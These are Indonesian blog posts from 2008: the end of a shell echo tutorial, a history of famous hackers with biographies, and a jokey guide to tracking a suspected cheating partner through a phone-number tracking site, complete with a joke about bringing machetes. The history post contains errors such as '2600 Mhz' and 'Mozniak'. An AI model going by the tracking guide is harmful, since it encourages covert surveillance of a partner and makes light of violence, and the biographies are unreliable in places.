tentunya layout diatas akan disesuaikan dengan system yang anda gunakan statement echo dengan opsi -n akan membuat posisi kursor untuk tidak berpindah ke baris baru karena secara default statement echo akan mengakhiri proses pencetakan ke standar output dengan karakter baris baru (newline), anda boleh mencoba tanpa menggunakan opsi -n, dan lihat perbedaannya. opsi lain yang dapat digunakan adalah -e (enable), memungkinkan penggunaan backslash karakter atau karakter sekuen seperti pada bahasa C atau perl, misalkan :

echo -e "\abunyikan bell"

jika dijalankan akan mengeluarkan bunyi bell, informasi opsi pada statement echo dan backslash karakter selengkapnya dapat dilihat via man di prompt shell.

[fajar@linux$]man echo
Oi.. Bro , sedikit pengetahuan mengenai "Shell" berhubung penjelasannya padet banged, dan kalo dijelasin pada posting ini mungkin kurang efektif dan juga terlalu panjang, kalian dapat melanjutkan informasi diatas selengkapnya disini

Baca Selengkapnya..

Senin, 09 Juni 2008

Mengenal Sejarah Hacker dan Tokoh - tokohnya

Hola dekaters pa kabar kalian ??? kami harap kabar kalian selalu baik, untuk posting kali ini kami sedikit berbagi informasi mengenai dunia hacking dan tokoh-tokohnya, seperti yang kita ketahui bahwa hacker muncul sejak era perang dunia II / sejak komputer pertama kali tercipta. Nah untuk mengetahui lebih lengkap-nya lagi informasi mengenai hal ini ikuti berita dibawah ini :

Siapakah sebenarnya mereka ?

Nampaknya memang sudah hukum alam bahwa perkembangan teknologi akan melahirkan kelompok sosial baru. Di sisi yang lebih umum, atau katakanlah sisi "terang", kita bisa melihat programmer, teknisi, pemain game komputer, dsb. Sementara itu di sisi yg lebih "gelap", juga muncul berbagai kelompok baru.

Sejarah Hacker

Mungkin tidak banyak yg tahu. bahwa hacker, sebagai sebuah kelompok dalam masyarakat komputer, telah melalui suatu perjalanan yg panjang, mengalami evolusi, perkembangan dan berbagai perubahan, hingga akhirnya mencapai bentuk yg dikenal orang sekarang ini.

Masa masa awal

Semua berawal pada era komputer raksasa (benar-benar raksasa), sekitar akhir Perang Dunia II (1945) samapai tahun 60-an. Pada masa itu, komputer, selain besar juga merupakan barang langka, yg tidak bisa digunakan sembarang orang. Contoh komputer raksasa yg terkenal di sekitar tahun 40-50`an adalah Electronic Numerical Integrator and Calculator (ENIAC) yg berbobot 30ton dan Mark1, yang masih diprogram dengan bahasa tingkat rendah assembler demi optimasi kecepatan (pada zaman itu komputer masih amat, amat, amat lambat).

Tokoh-tokoh beken pada zaman itu, misalnya Seymour Cray (perancang lini superkomputer CRAY yg digunakan di berbagai instansi penting AS) dan Eckert umumnya adalah ilmuwan-ilmuwan kelas atas yg mampu merancang komputer serta perangkat lunaknya sekaligus. Cray sendiri misalnya, memiliki gelar Master dalam bidang matematika terapan dari universitas Minnesota. Konon, ia bahkan pernah merancang sendiri sebuah komputer sekaligus sistem operasinya (dalam bahasa mesin) yg kemudian berjalan tanpa cacat.

Suatu hari pada tahun 1961, lab kecerdasan buatan (AI) Massachusets Institute of Technology (MIT) memperoleh komputer pertamanya, sebuah PDP (Programmable Data Processor)-1 buatan Digital Equipment Corporation. Para mahasiswa lab AI memanfaatkanya untuk bereksperimen. Pada saat itu mereka berprinsip bahwa akses komputer harus menyeluruh, dan karena itu mereka juga mengadakan penyusupan-penyusupan untuk menggunakan komputer tersebut di luar waktu yg diberikan. Ini mungkin cikal-bakal dari penyusupan-penyusupan yg dilakukan hacker modern.

Selain program, mereka juga bekerja dalam pembuatan proyek MAC (Multiple Acces Computer), komputer multi-user yg pertama. Para mahasiswa MIT inilah yg pertama kali menggunakan istilah "hack" yg kala itu berarti "teknik pemrograman yg kreatif, yg mampu memecahkan suatu masalah secara jauh lebih efisisen daripada teknik biasa". Pada saat itu hack sangat bermanfaat karena dapat menghemat sumber daya para "besi raksasa" tsb.

Pada tahun 1970-an, kembali berbagai perkembagan muncul di dunia hacker pada khususnya dan dunia perkomputeran pada umumnya. Tahun 1970 adalah tahun dimana lahirnya OS UNIX dari tangan Ken Thompson dan Dennis Ritchie (Bell Labs). Dennis Ritchie juga menciptakan bahasa C, dan kedua perangkat lunak itu, dengan kemampuan untuk digunakan di berbagai OS (kontras dgn program di masa itu yg bersifat hardware-specific), amat populer di kalangan hacker karena memudahkan mereka.

Namun demikian, kalangan hacker di saat itu masih terdiri dari "penghuni universitas", karena memang saat itu komputer masih ada di univesitas-universitas, di samping instansi pemerintah. Keadaan ini berlangsung sampai pertengahan 70-an.

Lalu datanglah perubahan itu. Komputer pribadi. Kelahiran komputer pribadi Altair pada pertengahan 70-an membawa perubahan besar pada dunia hacker, demam komputer pribadi ini dengan sendirinya meningkatakan jumlah hacker. Namun dibandingkan pendahulunya hacker-hacker ini lebih banyak berkutat di perangkat lunak/software.

Aktivitas hacker sebenarnya dapat dibagi jadi 4 tahapan :

  1. Mencari sistem komputer untuk dimasuki dan mengumpulkan informasi
  2. Menyusup Masuk
  3. Menjelajahi sistem tsb.
  4. Membuat backdoor dan menghilangkan jejak

Ada baiknya kalau kita melihat beberapa tokoh hacker terkenal, baik dari kalangan 60-an ataupun dari generasi yg muncul kemudian. Terlepas dari baik buruknya, mereka adalah hacker-hacker terkenal di dunia bawah tanah komputer ataupun di dunia "atas tanah". Berikut adalah daftar nama-nama mereka :

Dennis M. Ritchie

Dennis M RitchieNama Handle dmr dilahirkan di Bronxville, New York pada tanggal 9 September 1941, ia memperoleh gelar BSc di bidang Fisika dan gelar PhD Matematika Terapan di Harvard University. Pada tahun 1967 atau setahun sebelum tesis doktoral selesai, ia mengikuti jejak ayahnya bekerja di Bell Laboratories. Proyek Komputer pertamanya di Bell adalah sistem operasi Multics, yang merupakan proyek kerjasama Bell Laboratories, MIT dan General Electric. Dennis kemudian bekerjasama dengan Ken Thompson, dan menulis sistem operasi UNIX yang kemudian diketahui sebagai sistem operasi pertama yang dapat digunakan di berbagai jenis komputer. Untuk menghasilkan sistem operasi ini, ia dan Ken Thompson menyempurnakan bahasa pemrograman B karya Ken, kemudian menghasilkan bahasa C, yang digunakan untuk menulis UNIX dan program bantunya. Sampai sekarang Dennis dan Ken masih aktif di Bell Labs. Proyeknya yang sudah diselesaikan antara lain sistem operasi Plan9 dan Inferno.

Ken Thompson

Ken ThompsonKen Thompson adalah mitra kerja Dennis yang bisa dibilang paling dekat mulai proyek penyempurnaan bahasa pemrograman B, kemudian menghasilkan bahasa C, lalu membuat sistem operasi UNIX, dan seterusnya. Kerjasama Ken dan Dennis yang kompak ini terlihat dari hasil dan beberapa penghargaan yang mereka terima. Bahkan semua penghargaan yang diperoleh Ken dan Dennis adalah hasil kerjasama mereka. Penghargaan penghargaan tersebut antara lain ACM Award (1974), IEEE Emmanuel Piore Award (1982), Bell Laboratories Fellow (1983) Asociates for Computing Machinery Tuning Award (1983), U.S National Medal of Technologu (1999) dll.

Ricard M. Stallman
Ricard M StalmanNama Handdle RMS lahir tahun 1953 dan merupakan salah seorang hacker generasi pertama yang paling terkenal. Ia pertama kali menggunakan komputer saat berumur 16 tahun, di IBM Scientific Center tahun 1971, setelah lulus undergraduate (S1) Harvard University, ia bekerja di laboratorium kecerdasan buatan Massachusets Institute. Ia bersama hacker-hacker generasi pertama MIT membuat berbagai macam program bantu untuk komputer-komputer raksasa yang dignakan MIT saat itu. Pada tahun 1980 ia secara resmi keluar dari MIT. Ia juga membuat sistem operasi GNU pengalaman semasa di MIT digunakannya untuk membantu Steven Levy menulis bukunya yang berjudul Hackers Heroes of The Computer Revolution, tahun 1984. Belakangan ini ia menentang anggapan bahwa perangkat lunak adalah hak milik pribadi, dan mendirikan Free Software Foundation. Modul modul program buatan Free Software Foundation lah yang kemudian menolong Linus Torvalds dalam menciptkan Linux. Selain itu Stallman juga menyatakan ketidakpuasannya terhadap trend hackers dewasa ini, dan secara pribadi menolak penggunaan kata hacker untuk merujuk kepada orang-orang yang memasuki sistem orang lain.

Steve Mozniak

Ia dibesarkan di Sunnyville, waktu muda ia bercita-cita memiliki komputer sendiri. Semasa sekolah, ia sering membuat desain-desain komputer. Kecerdasannya di bidang matematika dan bantuan ayahnya, seorang insinyur, membantunya dalam berbagai proyek elektonikanya. pada pertengahan 1975, steve berhasil merancang komputer pribadinya. Saat itu konsep komputer pribadi Steve diremehkan perusahaan-perusahaan besar seperti IBM, yang memilih untuk memproduksi komputer-komputer berkemampuan besar yang berukuran raksasa dan mahal. Lalu, Steve bekerjasama dengan seorang rekannya Steve Jobs, dan mendirikan Apple Computer. Produk pertama dari perusahaan dengan dua orang karyawan ( hanya Mozniak dan Jobs) itu adalah Apple I, tetapi produk yang membuat Apple Computer terkenal adalah Apple II, yang keluar pada tahun 1977. Segera setelah itu (1980) Apple Computer Go Publik, dan steve Mozniak saat itu berusia 30 tahun, menjadi jutawan baru. Setelah beberapa lama menikmati kesuksesan Apple Computer, Steve Mozniak memutuskan untuk keluar. Tetapi pada tahun 1996, ia kembali lagi ke perusahaan itu dengan jabatan penasehat.

Robert T. Morris
Robert Morris
Nama Handlenya adalah RTM. Robert Tappan Morris dilahirkan pada tahun 1966, ia adalah putra dari seorang ilmuwan National Computer Security Center (bagian dari National Security Agency Amerika Serikat), yaitu Robert Morris Senior. Sayang ia tidak seperti ayahnya Robert Morris Senior, ia justru terkenal karena mengacaukan internet dengan program worm ciptaanya. Penemuan Robert Morris junior dengan komputer sebenarnya berawal ketika ayahnya membawa salah sati komputer penyandi pesan Enigma (digunakan tentara jerman pada masa perang) dari tempat kerjanya. Pada saat remaja Robert Morris sudah berhasil meng hack sistem komputer Bell Labs dan memperoleh akses super user. Pada tanggal 2 November 1988, saat masih menuntut ilmu di Cornell University. Robert Morris menulis sebuah program worm (yang menurutnya ditujukan untuk penelitian). Worm karya Morris memiliki kemampuan untuk menyebar di internet secara otonom, memanfaatkan kelemahan yang umum pada sistem UNUX, mengeksploitasi sendmail dan berbagai kemampuan lainnya. Program worm tersebut kemudian menyebar secara tak terkendali dan akhirnya memacetkan ribuan komputer di internet. Kasus ini akhirnya mendorong pembentukan CERT ( Computer Emergency Resource Team ), badan pertama yang bertugas menangani kasus-kasus keamanan di internet. Robert Morris sendiri didenda US $ 10.000 dan menjadi orang yang paling terkenal karena menulis virus.

Kevin Poulsen

Poulsen

Komputer pribadi pertama Poulsen adalah TRS (trash 80) komputer yang sama yang digunakan tokoh film War Games. Poulsen pada akhir tahun 1980 berurusan dengan FBI karena berhasil menembus sistem komputer mereka. Dengan aksesnya itu ia berhasil mendapatkan seluruh data-data "perusahaan" yang dijalankan oleh agen-agen FBI. Ia dicari dengan tuduhan membahayakan keamanan nasional, Kevin poulsen terpaksa bersembunyi. Dalam pengejaran, pada tahun 1990, ia berhasil memenangkan kontes telepon yang diselengarakan oleh sebuah radio di Los Angeles. Caranya cukup unik, yakni mengambil alih sistem komputer perusahaan telepon Los Angeles, memblokir semua telepon ke stasiun radio tersebut, dan membuat dirinya sendiri menjadi penelpon ke 102 ( dan otomatis menjadi pemenang) dalam kontes itu. Sebagai hadiah ia memperoleh sebuah mobil Porsche 944 S2, dan juga liburan ke Hawaii. Setelah tertangkap, ia dihukum 5 tahun, atas tuduhan pencucian uang dan kejahatan telepon. Pada tahun 1998 lalu ia dibebaskan dan kembali ke masyarakat, dan menjadi penulis tetap pada perusahaan ZDTV. Rubrik yang diasuhnya adalah Chaos Theory, sebuah rubrik kejahatan komputer yang muncul setiap Jumat.

Kevin Mitnick

Mitnick

Kevin David Mitnick mungkin merupakan hacker yang paling banyak dipublikasikan karena terlibat perkara-perkara kriminal. Lahir pada tahun 1963, ia memulai karir hackingnya semasa masih remaja di Los Angeles, sekitar tahun 70-an. Orang tuanya bercerai, da ia tinggal bersama ibunya. Semasa remaja, karena ia tidak mampu membeli komputer, ia menghabiskan waktunya di sebuah toko Radio Shack dan bermain-main dengan komputer disana. belakangan, Mitnick meneruskan kegiatan hackingnya, dan menimbulkan konflik dengan penegak hukum AS. Aksinya antara lain adalah di WELL (Whole Earth Lectronic Link), dan di komputer-komputer pakar keamanan komputer (Dan Farmer, Erick Allman dsb). Akhirnya ia ditangkap untuk kelima kalinya pada bulan Februari tahun 1995 setelah pelacakan FBI yang dibantu pakar keamanan Tsutomu Shimomura. Tuduhannya antara lain pemilikan 20.000 nomor kartu kredit curian, menyalin sistem operasi DEC ( Digital Equipment Corporation ) secara ilegaldan menggunakan komputernya untuk mengambil alih seluruh hub jaringan telepon New York dan California. Namun perlakuan tidak adil dari penegak hukum (antara lain penahanan sejak tahun 1995 tanpa uang jaminan dan tanpa prosen peradilan) dan media massa telah menimbulkan gelombang pro Mitnick. Ini ditunjukan antara lain dngan protes, pembuatan home page yang dikhususkan untuk Kevin Mitnick, dan pemasangan logo "Free Kevin" di berbagai situs Under Ground yang mendukung.

John Draper

Drapper

Nama Handle : "Cap'n Crunch". John Draper adalah seorang figur yang menginginkan menelpon gratis kemana saja dan kapan saja. Dia adalah hackers generasi pertama yang beroperasi di bidang telekomunikasi dan dia mendapat julukan Phreaker yaitu Hacker di bidang telekomunikasi. Dia menemukan cara untuk melakukan hubungan telepon jarak jauh yaitu dengan sebuah kotak sereal yang pada tutupnya diberi sebuah peluit, lalu peluit itu ditiup secara perlahan-lahan maka akan menghasilkan nada 2600 Mhz dengan sempurna, setelah itu peluit itu ia dekatkan kepada pesawat penerima telepon maka telepon akan tersambung tanpa biaya. John Draper pernah bertugas di US Air Force dan mendapat penghargaan pada tahun 1968 setelah kembali dari Vietnam.

Johan Helsingius

Helsingius

Nama Handle " Julf". Kegiatan yang membuatnya terkenal adalah membuat anonymous remailer, yang dikerjakan di penet.fi, toko miliknya yang akhirnya ditutup pada bulan September 1996. Helsingius membuat perkara kriminal pada pertengahan tahun 1995 yang berakhir di tangan kepolisian setelah Church of Scientology meng complain pelanggan penet.fi yang memasuki jaringan rahasia Church of Scientology lewat jaringan internet. Dia menggunakan komputer dengan spesifikasi mesin 486 dengan harddisk 200 Mega Byte.

Vladimir Levin

Levin

Vladimir Levin mendapatkan gelar Graduate di St. Petersburg Tekhnologichesky University, dia seorang ahli di bidang matematika. Yang membuatnya terkenal adalah pembobolan sistem komputer pada bank-bank terkenal di Wall Street, New York salah satu bank yang ia bobol adalah Citibank yang terjadi pada tahun 1994. Dalam Operasinya ia dibantu oleh rekan rekannya yang menamakan dirinya Russian Hackers Gank, dia berhasil menggondol uang sebanyak US$ 10.000.000 dengan cara tansfer ke rekening-rekeningya yang berada di Finlandia, Netherland dan Israel, tetapi akhirnya dia ditangkap interpol di Bandara Heathrow, london pada tahun 1995 lalu di ekstradisi ke Amerika serikat untuk mempertanggung jawabkan perbuatannya. Dalam beroperasi dia menggunakan Laptopnya, pada waktu itu ia masih bekerja di perusahaan komputer AO Saturn, St. Petersburg, Russia, dan komputer itu pula yang digunakan untuk membobol Citibank. Levin adalah hacker yang paling dicari-cari oleh agen-agen FBI pada waktu itu.

Linus Torvalds

Torvalds

Linus Benedict Torvalds dilahirkan di Helsinki, Finlandia pada tahun 1970. Pada saat muda, komputer pribadi mulai berkembang pesat. Saat menjadi mahasiswa, ia bercita-cita menulis sistem operasi yang lebih bagus dari DOS, dan gratis. Pada masa itu ia masih mengunakan MINIX klon dari UNIX yang berukuran lebih kecil, dan fasilitasnya masih relatif terbatas. Mahasiswa ilmu komputer di University of Helsinki ini lalu mendiskusikan idenya ini dengan rekan-rekannya. Dengan bantuan rekan-rekannya itu, ia merancang LINUX, sistem operasi yang mirip UNIX (yang fasilitasnya jauh diatas MS-DOS). Dalam waktu sekitar tiga tahun , mereka berhasil menyelesaikan Linux, dan mendistribusikannya secara cuma-cuma. Linux kemudian berkembang menjadi berbagai versi ( Linus Torvalds sendiri menggunakan versi Red Hat ). Pada awal tahun 1997, Linus dan istrinya, Tove, pindah dari Helsinki ke Santa Clara, California Amerika Serikat. Mereka dikaruniai dua orang putri, Patricia Miranda Torvalds dan Daniela Torvalds. Linus sekarang bekerja di perusahaan Trans Meta.

Yuhuuu... bertambah lagi dech ilmu kita, nah sobat di antara deretan tokoh-tokoh hacker terkenal diatas ada 1 ( satu ) tokoh hacker yang paling dikenal ( the most hacker ) dia seluk beluk kehidupan dunia nya dan komputer penuh dengan kontroversi, siapakan dia ?? siapa lagi kalau bukan " Kevin Mitnick " hingga kisah hidupnya pun dikisahkan didalam sebuah buku yang berjudul
" The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders & Deceivers "

mau tau bagaimana sepak terjang Kevin dalam dunia Hacking ?? kalian dapat me - download artikel nya di sini artikel tersebut dimuat dengan format .rar gunakan password www.softarchive.net untuk me - ekstraknya.

Ada juga film dokumentasi tentang hacker di New York, besar filenya 362 Mb. Film ini bercerita mengenai komunitas hacker di negara Paman Sam tersebut dan bagaimana cara mereka mengintimidasi program pada komputer, pokoknya seruuu dech.. cocok banged untuk kalian yang ingin mengetahui lebih dalam mengenai dunia hacker untuk me - downloadnya klik ini .

Sekian dulu bro posting untuk kali ini sedikit informasi mengenai dunia hacker, semoga bermanfaat dan bagaimanapun juga, ”a crime is a crime” dan ”judge makes the rule" so wannabe a HACKER.
Baca Selengkapnya..

Senin, 02 Juni 2008

Alat Pelacak Selingkuh

Hubungan kalian lagi gak harmonis, pasangan tidak perhatian seperti dulu, ada tanda-tanda mencurigakan ( sms / call g diangkat ?? atau bahkan di cancel ! ), pasangan lupa apel, atau waktu main kerumahnya dia selalu gak ada/ menghilang di ketiak sang ibu ??!! ( alias ibu yang sering dijadiin kambing hitam ) hehehehe.. Oo.. jangan - jangan pasangan kita lagi selingkuh ?? oh.. no.. don`t had the blues guys... artinya jangan dulu bersedih kawan..!! kali ini kita akan membantu kalian "korban-korban" selingkuh untuk dapat melacak keberadaan pacar, istri, suami, ataupun gebetan kamu yang lagi selingkuh !! keren g tuh... :D
eit.. tapi ada syaratnya ( wajib punya handphone ) karena kita lacak melalui no handphone !!

ok bro, ikuti langkah - langkah dibawah ini :
  1. Pertama - tama siapkan mental kamu
  2. Berdoa dengan kepercayaan masing - masing agar sesuai dengan harapan kamu ( cewek,cowok,suami,atau istri kamu gak selingkuh )
  3. Siapkan juga parang,golok,palu ato benda tajam apa aja dech buat habisin tuh ce/co kalian yang ketauan selingkuh wekeke.. !! jangan² dilarang pakai kekerasan Ok ?!
  4. Dan yang pasti siapkan juga kendaraan ( motor, mobil, sepeda, becak, atau tukang ojek sekalipun ) untuk meluncur ke TKP hihihi...
  5. Masukkan nomor hp cewek/cowok yang lagi selingkuh / kira -kira selingkuh :D (mis. 081 234 567 8910 masukkan menjadi 81 234 567 8910) pada " Track a Phone Number Here "
  6. please wait 1 minutes... alias ngrantosi setunggal menit riyen.. :D satelit akan melacak dimana keberadaan si pemegang hape tersebut.
kalian dapat mencobanya disini

Jangan sesali semua informasi yang muncul pada satelite tracking! karena mesin juga yang merancang dan menciptakan adalah manusia dengan segala keterbatasan dan kemampuan yang dimiliki. Emang DORAEMON apa punya kantong ajaib yang bisa mengeluarkan apa saja yang kita punya
.
:D
Baca Selengkapnya..